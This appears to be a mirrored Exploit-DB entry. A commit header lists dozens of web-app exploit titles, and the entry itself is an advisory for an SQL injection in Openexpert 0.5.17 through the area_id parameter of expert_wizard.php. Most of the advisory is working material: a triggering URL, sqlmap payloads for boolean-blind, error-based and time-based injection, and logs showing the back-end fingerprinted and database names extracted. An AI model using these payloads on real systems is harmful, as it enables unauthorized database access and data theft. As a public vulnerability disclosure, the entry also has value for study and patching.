exploit-db-mirror/platforms/php/webapps/41087.txt
Offensive Security 19000e5589 DB: 2017-01-18
4 new exploits

MkPortal 1.1.1 reviews / Gallery modules - SQL Injection
MKPortal 1.1.1 reviews / Gallery modules - SQL Injection

Joomla! Component GigCalendar 1.0 - SQL Injection
Joomla! Component gigCalendar 1.0 - SQL Injection
Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection
mkportal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection
Free Bible Search PHP Script - 'readbible.php' SQL Injection
Joomla! Component RD-Autos 1.5.5 - SQL Injection
MKPortal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection
Free Bible Search PHP Script - SQL Injection

Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion
Simple PHP NewsLetter 1.5 - Local File Inclusion

Joomla! Component Gigcal 1.x - 'id' SQL Injection
Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection

SCMS 1 - 'index.php p' Local File Inclusion
SCMS 1 - Local File Inclusion

Max.Blog 1.0.6 - (show_post.php) SQL Injection
Max.Blog 1.0.6 - 'show_post.php' SQL Injection
Max.Blog 1.0.6 - (submit_post.php) SQL Injection
Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass
Max.Blog 1.0.6 - 'submit_post.php' SQL Injection
Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass

Joomla! Component com_simplefaq - 'catid' Blind SQL Injection
Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection

dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities
dirLIST 0.3.0 - Local File Inclusion
dirLIST 0.3.0 - Arbitrary File Upload
BoZoN 2.4 - Remote Code Execution
Check Box 2016 Q2 Survey - Multiple Vulnerabilities
Openexpert 0.5.17 - SQL Injection
2017-01-18 05:01:17 +00:00

48 lines
1.6 KiB
Text
Executable file

# Title : Openexpert 0.5.17 - Sql Injection
# Author: Nassim Asrir
# Author Company: Henceforth
# Tested on: Winxp sp3 - win7
# Vendor: https://sourceforge.net/projects/law-expert/
# Download Software: https://sourceforge.net/projects/law-expert/files/
#################################################
## About The Product : ##
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.
## Vulnerability : ##
- Vulnerable Parametre : area_id
- HTTP Method : GET
- To exploit it : http://HOST/expert_wizard.php?area_id=1'
- Sqlmap Output :
Parameter: area_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area_id=1 AND 4961=4961
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: area_id=1 AND SLEEP(5)
---
[15:35:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.26
back-end DBMS: MySQL >= 5.0
[15:35:38] [INFO] fetching database names
[15:35:39] [INFO] the SQL query used returns 5 entries
[15:35:39] [INFO] retrieved: information_schema
[15:35:39] [INFO] retrieved: mysql
[15:35:39] [INFO] retrieved: performance_schema
[15:35:39] [INFO] retrieved: sys
[15:35:39] [INFO] retrieved: test